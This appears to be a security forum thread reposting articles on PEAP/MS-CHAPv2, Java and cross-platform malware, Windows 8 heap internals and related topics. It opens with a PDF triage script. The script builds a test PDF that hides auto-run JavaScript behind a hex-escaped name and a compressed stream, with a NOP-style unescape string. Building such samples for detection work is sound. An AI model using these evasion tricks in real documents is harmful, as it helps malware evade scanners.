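        d, body = m.group(1), m.group(2)
        if b"/FlateDecode" in d:
            try:
                body = zlib.decompress(body)
            except zlib.error:
                pass
        out.append((d, body))
    return out


def triage(data: bytes) -> dict:
    """Keyword counts over the raw file plus a verdict per decoded stream."""
    report = {"raw": count_keywords(data), "streams": []}
    for d, body in extract_streams(data):
        report["streams"].append({
            "dict": normalise_names(d).strip(),
            "keywords": {k: v for k, v in count_keywords(body).items() if v},
            "script_like": bool(SCRIPT_RE.search(body)),
        })
    return report


def build_sample_pdf() -> bytes:
    """Constructed PDF: the catalog's /OpenAction runs a JavaScript action whose
    code sits in a FlateDecode stream; the action's /S name is hex-escaped."""
    js = b"var s = unescape('%u9090%u9090'); app.alert(s.length);"
    comp = zlib.compress(js)
    objs = [
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n",
        b"3 0 obj\n<< /Type /Action /S /J#61vaScript /JS 4 0 R >>\nendobj\n",
        b"4 0 obj\n<< /Length " + str(len(comp)).encode()
        + b" /Filter /FlateDecode >>\nstream\n" + comp + b"\nendstream\nendobj\n",
    ]
    return b"%PDF-1.4\n" + b"".join(objs) + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    rep = triage(build_sample_pdf())
    print({k: v for k, v in rep["raw"].items() if v})
    for s in rep["streams"]:
        print(s["dict"], s["keywords"], "script_like=%s" % s["script_like"])
```

The two details that trip up a plain `grep` are the ones handled explicitly: a name like `/J#61vaScript` only matches after the escape is resolved, and the script body is invisible until the stream is inflated. A `/OpenAction` that resolves to a JavaScript action with a compressed body is exactly the shape worth pulling into peepdf's interactive mode or PDFStreamDumper next.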
-
[h=3]Is WPA2 Security Broken Due to Defcon MS-CHAPv2 Cracking?[/h]
[h=2]Tuesday, July 31, 2012[/h]
Quick answer - No. Read on to hear why.

A lot of press has been released this week surrounding the cracking of the MS-CHAPv2 authentication protocol at Defcon. For example, see these articles from Ars Technica and CloudCracker. All of these articles contain ambiguous and vague references to this hack affecting Wi-Fi networks running WPA2 security. Some articles even call for an end to the use of WPA2 authentication protocols such as PEAP that leverage MS-CHAPv2. But they fail to paint a true and accurate picture of the situation and the impact to Wi-Fi networks. I think this is misleading, and that any recommendation to stop using PEAP is flat-out wrong! So let's clarify things.

Is MS-CHAPv2 authentication broken?
Answer - Based on what I've read, let's assume it is TOTALLY broken. You can read about the details in those other articles. But for the topic of this post, applicability to Wi-Fi networks, it really doesn't matter whether it is broken or not.

What is the Impact to Wi-Fi Network Security?
Specifically, does this make much of an impact on Wi-Fi networks where 802.1X authentication is employed and MS-CHAPv2 is used (namely EAP-PEAPv0 and EAP-TTLS)?
Answer - No, it really does NOT. The impact is essentially zero. Let me explain why.

EAP Tunneled Authentication Protocols
MS-CHAPv2 is only used in what we call "tunneled authentication protocols," which include EAP-PEAPv0 and EAP-TTLS. These EAP protocol specifications acknowledge that many insecure and legacy authentication methods need protection and should not be used on their own. They deal with that by wrapping the insecure protocol inside another, much more secure, TLS tunnel. Hence, these protocols are called "tunneled authentication protocols."

This tunneling relies on asymmetric cryptography through the use of X.509 certificates installed on the RADIUS server, which are sent to the client device to begin connection setup. The client verifies that the certificate is valid (more on that in a second), proceeds to establish a TLS tunnel with the server, and then uses symmetric key cryptography for data encryption. Once the TLS tunnel is fully formed, the client and server use the less secure protocol, such as MS-CHAPv2, to authenticate the client. This exchange is fully encrypted using the symmetric keys established during tunnel setup. As in any TLS session, the asymmetric operations are used only to set the tunnel up; the bulk exchange uses symmetric keys, which are much faster. This is fundamentally the same method used for HTTPS sessions in a web browser. Here is a reference ladder diagram of PEAP authentication which highlights the different phases of the connection process (outer TLS tunnel setup and inner MS-CHAPv2 authentication).

[Figure: PEAP Ladder Diagram]

So, MS-CHAPv2 is not used natively for Wi-Fi authentication. We're safe, right? Only if implemented properly.

Importance of Mutual Authentication
The key link in this chain, then, is the mutual authentication between the RADIUS server and the wireless client. The client must properly validate the RADIUS server certificate first, prior to sending its credentials to the server. If the client fails to properly validate the server, then it may establish an MS-CHAPv2 session with a fake RADIUS server and send its credentials along, which could then be cracked using the exploit that was shown at Defcon.
This is commonly referred to as a Man-in-the-Middle attack, because the attacker is inserting their RADIUS server in the middle of a conversation between the client and the user database store (typically a directory server).

[Figure: RADIUS Server Validation and Exposure to Attack]

The RADIUS server is validated as long as the certificate that it sends is trusted. For most client platforms, trusted certificates are provided by the manufacturer for public Certificate Authorities and PKI systems (such as Verisign, Thawte, Entrust, etc.) and are held in the certificate store or keychain on the device. In addition, for corporate environments, administrators can deploy certificates to managed devices in a number of different ways to enable trust for private Certificate Authorities and PKI systems; the most common among these methods are Group Policy Objects (GPO) for Microsoft clients and Lion Server Profile Manager or the iPhone Configuration Utility (iPCU) for Apple clients (including OS X and iOS devices).

Enabling Server Certificate Validation on Clients
In Windows, RADIUS server validation is defined within each SSID profile. If you are looking directly on a Windows 7 workstation, you will want to view the SSID properties, select the Security tab, and go into the PEAP settings. Enable server validation, specify valid server names (which are checked against the Common Name, CN, within the server certificate presented to the client), restrict which Root CAs the server certificate can be issued from, and prevent the system from prompting users to accept untrusted certificates (which is important, since otherwise they could unknowingly accept a bad certificate and connect to an attacker's RADIUS server).

[Figure: Windows RADIUS Server Validation]

On Apple devices, including OS X Lion, Mountain Lion, and iOS, use the Lion Server Profile Manager or iPCU to define a configuration profile which includes credentials and a Wi-Fi policy. I'll show the iPCU in this example. First, add the Root CA certificate into the "Credentials" section. Next, define a Wi-Fi policy which specifies the trusted certificates and the certificate names allowed.

[Figure: Apple RADIUS Server Validation]

Client Behavior for Server Validation
In both vendors' implementations, the behavior of the client device is dictated by what policy has been defined on the system. If no policy for the SSID has been defined or pushed to the client device by an administrator, the default behavior is to prompt the user to validate the certificate. This is not ideal, since users typically have a hard time distinguishing what a certificate means and whether or not they should proceed. For example, when an Apple iPhone attempts to join a network for which no profile has been deployed, the user receives a prompt to accept the connection and proceed:

[Figure: iPhone Certificate Prompt]

Therefore, for all corporate 802.1X environments, it is recommended to push profiles for all 802.1X SSIDs that end users need onto their systems. This goes for both production access and BYOD scenarios. The behavior on Windows 7, OS X Lion / Mountain Lion, and iOS devices when a profile has been installed for a specific SSID is to check the local certificate store or keychain to validate the RADIUS server certificate. It must also match the Root CAs and server names specified in the deployed profile. In the event that an untrusted certificate is presented, all of these systems will NOT prompt the user and the connection is rejected. For example, here is a rejected connection by an Apple iPhone for an SSID that has had a profile deployed by an administrator:

[Figure: iPhone Certificate Rejection]

Outstanding Vulnerabilities
You should still be aware of a few indirectly related vulnerabilities that have not yet been resolved relating to Wi-Fi authentication with 802.1X.

First, the default behavior of all systems (especially personal devices) is to prompt users to validate the RADIUS server certificate. This is often confusing and can lead to bad actions being taken by users and attempted authentication through an attacker's RADIUS server. This can be mitigated by having corporate environments deploy configuration profiles for all SSIDs in their network, both production and BYOD. Don't fall into the BYOD trap of letting users connect on their own and try to decipher the certificate prompt. Establish a sound personal device on-boarding process which deploys a configuration profile to the device upon successful enrollment and policy acceptance. There are numerous ways to do this, ranging from simple solutions such as sending users a profile in an email or providing a web URL where they can download it, to more complex solutions such as MDM integration that allow self-registration with zero IT involvement.

Second, certificate binding to the SSID is still a manual process on wireless networks. It must be defined within the configuration profile. This is in contrast to the SSL and TLS protocols used for secure web access, where the end-user system can automatically verify that the FQDN within the URL matches the Common Name presented in the certificate. The manual binding process in Wi-Fi networks is borne out of a lack of extensibility within the PKI system to handle network access scenarios such as this. A better solution is needed.

Finally, certificate revocation checking cannot be performed by Wi-Fi clients, since they do not yet have a network connection with which to query a CRL distribution point or use OCSP. This means that client devices cannot check the status of the presented server certificate to see if it has been revoked, which could be the case for valid certificates that have subsequently been compromised or certificates that were improperly issued by a CA. However, there is hope that the forthcoming 802.11u extensions to Wi-Fi can provide the means for this to occur through message exchanges prior to full network connection (thanks to Christopher Byrd for pointing this out to me during a Twitter conversation).

Revolution or Evolution? - Andrew's Take
We've known that MS-CHAPv2 is an insecure protocol for a long time. The recent Defcon exploit has just taken that one step further. The designers of modern Wi-Fi security recognized the possible value in using legacy protocols such as these. Therefore, the EAP methods that employ such protocols were designed to tunnel the insecure protocol within a much more robust protocol such as TLS. These "tunneled authentication protocols" such as PEAP protect the insecure inner protocol through the use of certificates. The onus for proper security then falls on RADIUS server validation, to ensure the other end of the connection is trusted before allowing the client authentication to proceed. In a properly implemented wireless network, this MS-CHAPv2 exploit is a non-issue. There is no need for Wi-Fi network administrators to abandon PEAP. Period.
Security is a complex field. It may be hard to distinguish the FUD from fact. If you're interested in learning more about Wi-Fi security, then I highly recommend engineers take training provided in the CWSP (Certified Wireless Security Professional) course offered by CWNP, Inc. or the SEC-617 (Wireless Ethical Hacking, Penetration Testing, and Defenses) course offered by the SANS Institute. Cheers, Andrew vonNagy Sursa: Revolution Wi-Fi: Is WPA2 Security Broken Due to Defcon MS-CHAPv2 Cracking?
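The same PEAP policy the post describes for Windows and iPCU profiles (trusted Root CA restricted, server name checked, no user prompt) can be expressed for a Linux client in wpa_supplicant.conf. This is an added example, not part of the original post or of wpa_supplicant's own documentation; the SSID, CA file path, server name and credentials are placeholders.

```conf
# ADDED EXAMPLE (not from the original post). Placeholders: CorpWiFi,
# /etc/ssl/certs/corp-root-ca.pem, radius.corp.example, jdoe/secret.

# WEAK: no ca_cert and no server-name constraint. wpa_supplicant then
# accepts whatever certificate the RADIUS server presents, which is the
# "any RADIUS server" situation the post warns about: the MS-CHAPv2
# exchange inside the TLS tunnel can be completed with an untrusted peer.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2"
    identity="jdoe"
    password="secret"
}

# HARDENED: equivalent of the deployed Windows / iPCU profile.
# With ca_cert set, a chain that does not terminate at this Root CA fails
# the EAP exchange; with domain_suffix_match set, a certificate issued by
# the right CA but for the wrong host fails as well. wpa_supplicant does
# not prompt the user in either case, matching the "reject, no prompt"
# behaviour the post describes for clients with an installed profile.
network={
    ssid="CorpWiFi"
    key_mgmt=WPA-EAP
    eap=PEAP
    phase2="auth=MSCHAPV2"
    identity="jdoe"
    password="secret"
    # Only this Root CA may have issued the RADIUS server certificate
    # (the "restrict Root CAs" setting in the Windows profile).
    ca_cert="/etc/ssl/certs/corp-root-ca.pem"
    # The server certificate's name must be radius.corp.example or a
    # host under it (the "valid server names" / CN check in the profile).
    domain_suffix_match="radius.corp.example"
}
```

Both blocks can coexist during a migration; wpa_supplicant logs the certificate subject and the reason for rejection, which is what to look for when a client with the hardened block suddenly stops joining the SSID.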
-
[h=1]Volume of Malware Targeting Java CVE-2012-1723 Flaw Spikes[/h]

by Dennis Fisher

It's been nearly two months since Oracle patched the CVE-2012-1723 Java vulnerability, a serious remote pre-authentication flaw that's present in the Java Runtime Environment. It's taken a little time, but the attacker community has decided that this bug deserves some serious attention, and as a result, attacks trying to exploit it have ramped up significantly in recent weeks. The first malware samples that were exploiting this vulnerability started appearing about a month ago, but it was just in dribs and drabs. But by the second week of July, the number of attacks on CVE-2012-1723 began to take off dramatically. Microsoft researchers compiled statistics that show the volume of malware targeting the Java flaw really took off around July 10, and, with some peaks and valleys in the interim, is still quite high now.

The vulnerability itself is in a JRE sub-component called Hotspot and attackers who are able to exploit it will have the ability to execute arbitrary code on the target machine. "The issue is in the optimization performed when a field inside the class is accessed. A static field with a ClassLoader or Object type and a bunch of instance-fields with custom data type is a strong indication of exploitation. A bunch of instance-fields are a buffer area where a type-confused object is retrieved," Jeong Wook Oh of the Microsoft Malware Protection Center said in an analysis of the attacks.

An oddity with this vulnerability is that attackers don't have the ability to disguise what they're doing with their exploits in this case. Oh said that because attackers need to build a Java class with some specific attributes, it's relatively easy for analysts to see what's going on.

"Java-based malware could use a Java-reflection feature to obfuscate vulnerable class and methods loading code when the vulnerability is inside specific class and methods -- for example, CVE-2012-0507 was related to AtomicReferenceArray class. The loading of AtomicReferenceArray class itself can be obfuscated and you can't easily tell whether it is loading the specific class at all just by looking into the Java code. This makes the whole malware analysis process more time-consuming," Oh said. "For this vulnerability, attackers can't obfuscate the core exploit part easily. As we explained with Figure 3, the attackers need to create a class with specific features like static field member with ClassLoader type or Object type. And a bunch of instance fields follows. It has specific code pieces to run which looks like the code shown in Figure 4. Java doesn't provide ways to obfuscate this class structure itself, so the code pattern stands out. You can easily identify the pattern just by statically investigating the code."

Sursa: Volume of Malware Targeting Java CVE-2012-1723 Flaw Spikes | threatpost
-
[h=1]Hackers Increasingly Look for Cross-Platform Vulnerabilities[/h]

By Antone Gonsalves, 2-Aug-2012

[h=2]A Microsoft security researcher says malware makers seek 'economies of scale'.[/h]

More and more hackers are targeting the same application vulnerabilities on Macs and Windows PCs as a way to reap the financial benefits of writing cross-platform malware. The trend involves exploiting vulnerabilities that go as far back as 2009 in Office documents. Other cross-platform, third-party technologies favored by hackers include Java, Adobe PDF and Adobe Flash, Microsoft security researcher Methusela Cebrian Ferrer said Tuesday in the company's Malware Protection Center blog.

Targeting the same vulnerabilities in applications commonly found on both platforms allows hackers to reap profits twice from the same malware, a trend Ferrer calls "economies of scale in cross-platform vulnerabilities." "This method of distribution allows the attacker to maximize their capability on multiple platforms," he said.

Stephen Cobb, security evangelist for ESET, said cybercriminals have treated malware development and methods for infecting systems as a business for years. "We can expect to see further application of business logic -- such as economies of scale, division of labor and risk/reward calculations -- to developments in this space," he said in an interview via email.

Although targeted vulnerabilities may have already been patched by vendors, hackers bank on user negligence when it comes to installing software updates. As an example, people are notoriously slow in installing Java patches to Windows PCs and Macs. As much as 60 percent of Java installations are never updated, according to security vendor Rapid7. "All these un-updated applications on the desktop, whatever they may be, are low-hanging fruit," said Jamz Yaneza, research manager for Trend Micro. "These are the easiest things to attack."

Microsoft spotted the latest trend while investigating malware called Backdoor Olyx, which the software vendor first spotted a year ago. Subsequent variants since then demonstrated the cross-platform approach taken by malware writers. Backdoor Olyx and its variants are typically downloaded by victims clicking on malicious links or visiting malware-distributing Web sites. The Trojans are also distributed through e-mail attachments.

Because the malware attacks known vulnerabilities, the best defense is to keep security software up-to-date and install the latest operating system and third-party security patches. "This best practice should extend to all devices and platforms, especially those in large enterprise networks," Ferrer said. Additional options include uninstalling Java. While the platform is often necessary in servers, its importance has diminished in desktops and laptops with the use of newer Web technologies. To make other software safer, users can run applications in the safest configuration possible, according to Wolfgang Kandek, chief technology officer for Qualys. He noted, for example, that users can turn off Javascript in Adobe Reader as one way to bolster security in that software.

Sursa: Computerworld India News | Hackers Increasingly Look for Cross-Platform Vulnerabilities | Computerworld.in
-
Windows 8 Heap Internals

Contents
- Introduction
- Overview
- Prior Works
- Prerequisites
  - User Land
  - Kernel Land
- Terminology
- User Land Heap Manager
  - Data Structures
    - _HEAP (HeapBase)
    - _LFH_HEAP (Heap->FrontEndHeap)
    - _HEAP_LOCAL_DATA (Heap->FrontEndHeap->LocalData)
    - _HEAP_LOCAL_SEGMENT_INFO (Heap->LFH->SegmentInfoArrays[] / AffinitizedInfoArrays[])
    - _HEAP_SUBSEGMENT (Heap->LFH->InfoArrays[]->ActiveSubsegment)
    - _HEAP_USERDATA_HEADER (Heap->LFH->InfoArrays[]->ActiveSubsegment->UserBlocks)
    - _RTL_BITMAP (Heap->LFH->InfoArrays[]->ActiveSubsegment->UserBlocks->Bitmap)
    - _HEAP_ENTRY
  - Architecture
  - Algorithms – Allocation
    - Intermediate
    - BackEnd
    - Front End
  - Algorithms – Freeing
    - Intermediate
    - BackEnd
    - FrontEnd
  - Security Mechanisms
    - _HEAP Handle Protection
    - Virtual Memory Randomization
    - FrontEnd Activation
    - FrontEnd Allocation
    - Fast Fail
    - Guard Pages
    - Arbitrary Free
    - Exception Handling
  - Exploitation Tactics
    - Bitmap Flipping 2.0
    - _HEAP_USERDATA_HEADER Attack
  - User Land Conclusion
- Kernel Pool Allocator
  - Fundamentals
    - Pool Types
    - Pool Descriptor
    - Pool Header
  - Windows 8 Enhancements
    - Non-Executable (NX) Non-Paged Pool
    - Kernel Pool Cookie
  - Attack Mitigations
    - Process Pointer Encoding
    - Lookaside Cookie
    - Cache Aligned Allocation Cookie
    - Safe (Un)linking
    - PoolIndex Validation
    - Summary
  - Block Size Attacks
    - Block Size Attack
    - Split Fragment Attack
  - Kernel Land Conclusion
- Thanks
- Bibliography

Download: http://t.co/uOgkjkj4
-
JSON RPC

JSON RPC is a recently fashionable buzzword in the AJAX context. This lecture explains its principles, specifically the same origin policy for cross site scripting and its relation to JSON RPC, and demonstrates the essential implementation details using the example of the geocoding service in the google maps API.

The collection of technologies on which modern web applications are based is nowadays summarily referred to as AJAX, or "Asynchronous JavaScript and XML". Interestingly, the use of XML as the data format for the transfer between client and server is not only unnecessarily complicated, but in its usual incarnation as XMLHttpRequest it is also subject to restrictions that prevent the direct use of web services from the client side of the web application. A natural alternative to the transport of XML data structures through the XMLHttpRequest API is the transport of literal JavaScript expressions (nowadays also called JSON, or "JavaScript Object Notation") through dynamically created SCRIPT elements. We discuss practical aspects of the implementation of this approach and the consequences for architecture and software design of web applications. Because the circumvention of restrictions that were originally meant to maintain security might be frightening at first sight, we recapitulate the principles on which cross site scripting restrictions are based, and we discuss why their circumvention for the purpose of JSON/SCRIPT based data transport doesn't infract the security of a web application.

Authors: Steffen Meschkat
Submitted: August 05, 2012

Audio: IT Security and Hacking knowledge base - SecDocs
Slides: IT Security and Hacking knowledge base - SecDocs

Source: 23C3-1568-en-json_rpc.m4v
Size: 88.7 MB

Download: http://dewy.fem.tu-ilmenau.de/CCC/23C3/video/23C3-1568-en-json_rpc.m4v

Sursa: IT Security and Hacking knowledge base - SecDocs
-
[h=2][infographic] Where Malware Comes From[/h]

Dan Rowinski · August 2nd, 2012

Malware is a worldwide problem. If there is electricity, an Internet connection and a computer, there will be viruses, worms, Trojans and other sneaky programs trying to gain access to your computer. Where do these nasty creatures come from?

A large percentage of the world’s malware comes from China. According to AlienVault’s Open Threat Exchange platform, China is the capital of malicious Internet addresses, based on 95,249 addresses analyzed. The United States comes in second with 60,346, well ahead of the third, fourth and fifth malware vectors: South Korea (16,115), Russia (13,367) and Taiwan (12,504).

How is this malware being delivered? The average virus wants to find its way into computers. Direct injection (where a virus is not hidden in a different type of file) is fairly rare. Far more commonly, malware hitches a ride on an otherwise benign file. This is the reason why security programs scan all files downloaded to a computer. The top malware-infested file type is .exe, the most common file type for a Windows program. The second most common carrier is HTML content, which can be found on almost any Web site as well as in emails. Zip and RAR files, which bundle together other file types, are the third most common, while Adobe PDF and Flash files are also prevalent malware delivery vehicles.

The top types of viruses are all associated with Windows. While Mac malware exists and is becoming more prevalent, the amount of Windows malware on the Internet is nothing short of stunning. The top five malware content types found by the AlienVault community are all derivations of Windows viruses.

Since February, the AlienVault Open Threat Exchange has analyzed over 5 million suspicious URLs. That is a drop in the bucket in comparison to the billions of sites on the Internet, but a large enough sample to provide a sense of how much malware is present on the Web. The company received nearly 30 million entries from its users and found a little more than a million malicious addresses. See the infographic below for more details. The data was aggregated from AlienVault’s Open Threat Exchange from Feb. 20 to July 20, 2012. The data comes from the company’s customers as well as its Open Source Security Information Management (OSSIM), an open-source security information event-management platform.

Sursa: [infographic] Where Malware Comes From
-
[h=1]A quick look at security features on Microsoft's new Outlook.com email service[/h]

Posted on Sun, 05 Aug 2012 10:45 am EDT by Rich Edmonds

With the launch of Microsoft's Outlook.com, many have been questioning security features of the new email service. The most dominant topic is the limit of 16 characters for passwords. This is a limitation that was also present in Hotmail / Live and has been brought forward into its successor (due to Microsoft's login system). We'll take a look at this issue as well as a quick overview of additional security measures Microsoft has implemented to keep your emails safe.

Password character limitations

A counter question would be do you honestly need more than 16 characters? It's an argument that could span a number of pages in a forum thread or accumulate a hundred or so comments on this article. One side could -- of course -- argue that using as many characters as possible is more secure due to the creation of more possible combinations. On the other hand, the password "123456789101112131415" is less secure than "3%84Dji8u&L8D", so it's more about how consumers create their account passwords. Using a random generator (or simply having some fun with random combinations in Notepad if you have the time) is always recommended - of course you should always note down what you've decided on. It's amusing to hear / read about company security holes due to employee passwords, "Admin" being the best example. It's certainly not rocket science.

Microsoft has responded to concerns about the 16 character limit, should you be interested to read an official response:

"We are working on increasing this. Unfortunately, for historical reasons, the password validation logic is decentralized across different products, so it's a bigger change than it should be and takes longer to get to market. It's also worth noting that the vast majority of compromised accounts are through malware and phishing. The small fraction of brute force is primarily common passwords like '123456' not due to a lack of complexity."

That being said, we can't see an issue with the 16 character limitation. It shouldn't worry consumers when using the service. LinkedIn is a superb example of how security can go horribly wrong. Check out the following Rapid7 infographic (click for larger version) on the most popular passwords that were reportedly already cracked prior to the account passwords being stolen. You'll be surprised by what made the list. While we can understand the concern for the limitation and that those who are security obsessive would prefer to have a high amount of characters in passwords, it's not the end of the world should you ensure they're randomly generated with a sufficient combination of alphanumeric (and special) characters.

Single-use codes for masking account credentials

Microsoft has also implemented single-use codes for logging into Outlook.com when on a public computer or other devices where the user may be at risk of having their passwords detected. The single-use code enables Microsoft to text a passcode to the user's mobile phone (email and phone number required when attempting to login), which negates the need for the account password. The single-use code (as the name implies) can only be used once and is invalid once the user has successfully logged in. It's good to have extra protection in place for Outlook.com users to be able to access their email on computers / devices in public places.

Two-factor authentication and no targeted advertising

One of the major reasons Microsoft provides to attract Gmail users is the company will not be reading emails to provide targeted and relevant advertising using its network of publishers - remember the Gmail man? This ensures user data is kept private. While advertising is present on main folder view pages, it's in the form of general adverts that will be displayed to everyone.

Microsoft has also responded to a question on Reddit inquiring about two-factor authentication in its global login system:

"Over the last 6 months we have rolled out two-factor authentication in several systems that use Microsoft account. For example, you need to use two-factor auth to buy stuff on xbox.com, to remotely fetch files from other computers on SkyDrive and more. We are learning a lot from this and have more in the works. We see two-factor auth as being an increasingly important piece of our protection suite."

What we can all take away from this is that Microsoft is working hard on further tightening security in its products and backend services. We can expect to see more information and updates applied to enhance protection already implemented. All-in-all, rather good stuff. Let us know your thoughts in the comments, do you believe Microsoft is doing enough to secure your data in the cloud?

Sursa: A quick look at security features on Microsoft's new Outlook.com email service | wpcentral | Windows Phone News, Forums, and Reviews
-
[h=2]Top 15 Android-Ready Application Development Frameworks [/h]Wednesday, 01 August 2012 07:33 Eric Brown On July 20, Adobe unveiled version 2.0 of the open source PhoneGap, a leader among the growing crowd of cross-platform, Android-compatible, mobile app frameworks. Open source developers welcomed new PhoneGap features such as a "Cordova WebView" function that enables developers to integrate code into larger native applications. There are scores of such frameworks to choose from these days, and as seen in our Top 15 list below, the best are getting quite sophisticated. Yet there is still considerable grumbling about the state of mobile cross-platform frameworks. They may be fine for the majority of Android apps being developed, yet few seem to be capable of handling all the requirements of a professional-quality enterprise or consumer app. If you're familiar with Java and Eclipse, and Android is initially the sole destination, Google's Android SDK and related Android Development Tools (ADT) Eclipse plugin are probably the better choices. The problem is that most app publishers prefer to start with iOS, or else ship on iOS and Android simultaneously, with perhaps a BlackBerry or Windows Phone version as well. Others lack the experience to go native. Nevertheless, the official tools deserve a look, as it's usually difficult to port one's cross-platform effort to the Android SDK in mid-stream. So we'll start with Google's tools first before moving on to the multi-platform frameworks. [h=2]Google's Tools Get Friendlier[/h] Earlier this month, Google released Revision 20 of the SDK and ADT in conjunction with Android 4.1 ("Jelly Bean"), adding new debugging tools, application templates, and performance tweaks. Other Google tools include a native development kit (NDK) for hardware optimization and the Android Accessory gadget control application development kit (ADK). Android now offers an arguably superior platform to iOS. 
It provides much more flexibility, better app testing, and easier app approvals. Yet when it comes to overall ease of use, Apple may still have the edge. Although Android uses an easier, more widely known language in Java, Android's rich feature set and multitasking features are harder to master, and version- and device fragmentation can slow things down considerably. There are no easy fixes for these problems, but Google has at least worked hard to reduce the learning curve. Last month it revamped its Android Developers website to make it more accessible, following up on its previous launch of an Android training program and the publication of a style guide. [h=2]Cross-Platform Frameworks Duke it Out[/h] According to the Eclipse Open Source Developer Report 2012, 60 percent of open source developers writing Android or iOS apps use only the official SDK. Among those who use cross-platform frameworks, the choices, ranked from first to last were: - jQuery Mobile (28.6 percent) - PhoneGap (17.9) - Sencha Touch (7.9) - Dojo Mobile (4.9) - Titanium (2.8). These multi-platform options are typically open source JavaScript frameworks with support for HTML5 and CSS. Aimed primarily at web developers, they are often used for migrating website content to app form. The frameworks support Android and iOS at a minimum, and often target BlackBerry, Windows Phone, and Symbian. Although they typically come with a "write once, run anywhere" promise, the amount of tweaking required for each version can still be considerable, and optimization of memory, battery life, and performance is often limited. Most of the frameworks offer drag-and-drop GUI design tools, and many incorporate APIs aimed at exploiting specific components like audio and GPS. Quite a few are built on the Model View Controller (MVC) UI and component interaction model. 
[h=2]Platforms for Coding Beyond JavaScript[/h]

While PhoneGap and most of the leading frameworks are web-oriented HTML5/JavaScript apps that can tap native functions, some, like Appcelerator's Titanium, generate native Java code. While this approach has potential performance advantages, it tends to limit code reusability. Some frameworks specialize in programming environments beyond JavaScript. For example:

- RhoMobile is designed for Ruby developers.
- MoSync is aimed at C++ hackers.
- C#-flavored Mono for Android appeals to enterprise-focused developers familiar with Visual Studio.

Game developers, meanwhile, tend to use gaming-focused frameworks that offer specialized level-creation features, game engines, and 3D animation support:

- Corona SDK (the main player here)
- Flixel
- Unity3D

Educational organizations and others with limited needs and limited resources can turn to codeless, cross-platform app-building environments like TheAppBuilder. Google abandoned its own codeless App Inventor, but it was recently re-launched by MIT as the MIT App Inventor.

[h=2]Other Android-Ready Options[/h]

On the opposite extreme, those aiming to develop complex applications, often in conjunction with new hardware, may prefer the robust, commercial Android-compatible platforms from embedded Linux OS vendors like Wind River, MontaVista, and Mentor Graphics. These are especially useful when targeting form factors beyond smartphones and tablets. The Wind River Platform for Android run-time environment includes an optimized Android SDK, middleware, device drivers, and testing suites, as well as vertical market accelerators. Those looking to optimize their apps for particular processors can also find Android-ready tools from major ARM semiconductor vendors like Texas Instruments and Freescale, as well as ARM itself. Open source development board projects offer similar tools. MIPS and Intel, meanwhile, are building Android tools to support their own respective architectures.
Other Android-ready tools focus on particular steps in the development process. These include:

- Testing (Testroid, Appthwack)
- Performance management (Crittercism NDK)
- GUI design (DroidDraw, SPB UI Builder)

The latter category includes GUI tools from Motorola, HTC, and Samsung, designed for their respective UI skins. Finally, new cloud-oriented tools such as OpenMobster and Cumulus provide sync and other cloud support for Android apps.

[h=2]15 Android-Ready Development Frameworks[/h]

The following are 15 of the more popular Android development tools. Unless otherwise noted, they are open source, cross-platform frameworks:

Basic4android: Anywhere Software's commercial RAD tool and IDE for Android provides a comprehensive feature set and an object-oriented programming language similar to Visual Basic.
Basic4android (Basic for Android) - Android programming with Gui designer

Corona SDK: Widely used among game developers, Corona is also a popular, general-purpose framework. Corona Labs (formerly Ansca Mobile) claims an installed base of 120,000 developers. This high-end, commercial SDK offers over 500 APIs, as well as advertising and native UI support, and a built-in physics engine.
The Leader in Cross Platform Mobile App Development

DHTMLX Touch: This JavaScript and AJAX library focuses on UI widgets, and is aimed at building HTML5-based apps.
DHTMLX Touch - JavaScript Mobile Framework for Building HTML5 Web Apps

Dojo Mobile: The Dojo community's BSD-licensed HTML5/JavaScript framework has added MVC and app-controller packages, as well as mobile-specific components such as switches and sliders. A degree of PhoneGap compatibility is also available.
Dojo Mobile - The Dojo Toolkit

iUI: This lightweight web UI framework includes a JavaScript library, CSS support, and development images.
iUI - Mobile web framework for high-end devices

jQuery Mobile: This popular, lightweight HTML5-based framework is built on jQuery, and focuses on semantic markup, progressive enhancement, and themable design. It's the leading cross-platform framework among Eclipse open source developers.
jQuery Mobile | jQuery Mobile

Kendo UI: Telerik's HTML5/JavaScript framework is available in open source and commercial versions. Kendo UI offers a wide selection of UI widgets and plugins, and provides an MVVM framework, performance optimization, and validation and internationalization features.
Kendo UI - The Art of Web Development

Mono for Android: Xamarin's C#- and enterprise-oriented package is compatible with a similar iOS-based MonoTouch version, and can also share code with the C#-based Windows Phone. Mono supplies an environment conducive to Visual Basic developers, and is touted for its debugger and native binary compiler.
Xamarin

MoSync SDK: MoSync supports C++, HTML5/JavaScript, or both on up to nine different platforms. The SDK is touted as being compatible with PhoneGap, as well as MoSync's own new HTML5/JavaScript-based native mobile app developer/simulator, MoSync Reload.
Create iPhone and Android apps with JavaScript and C++ | cross-platform mobile application development

PhoneGap: Designed for JavaScript, HTML5, and CSS development, PhoneGap is now sponsored by Adobe and the Apache Foundation. The 2.0 version adds Windows Phone support, new CLI functions, and overhauled JavaScript libraries. It also debuts Cordova WebView, an embeddable HTML rendering control that uses Apache's Cordova-JS API for tasks such as integrating PhoneGap code into larger native apps.
PhoneGap | Home

RhoMobile Suite: Motorola's mature, business-oriented framework features RhoConnect, RhoStudio, RhoElements, and a new RhoHub used for cloud app-building. RhoMobile is built on the Ruby language, the Rails Framework, and the MVC model.
RhoMobile Suite - Motorola Solutions USA

Sencha Touch 2: Sencha's popular HTML5/JavaScript framework provides 50 built-in components, state management, and an integrated MVC system. It now offers a free native packager that streamlines distribution to stores like Google Play.
http://www.sencha.com/products/touch/

SproutCore: This HTML5-driven framework offers a "clean" MVC architecture, and emphasizes performance optimization and scalability.
SproutCore

TheAppBuilder: JamPot's new HTML5-based native app-building app has received plenty of buzz. It features a codeless, drag-and-drop interface that lets users quickly build fairly rudimentary apps by filling in Q&A checklists. Highlights include extensive social networking integration and automated submissions to Google Play.
TheAppBuilder

Titanium: Appcelerator claims its Android/iOS framework supports over 5,000 device and mobile-OS APIs. Unlike the more web-oriented frameworks, Titanium uses JavaScript to create native code, with claimed benefits in performance.
Titanium SDK | Appcelerator

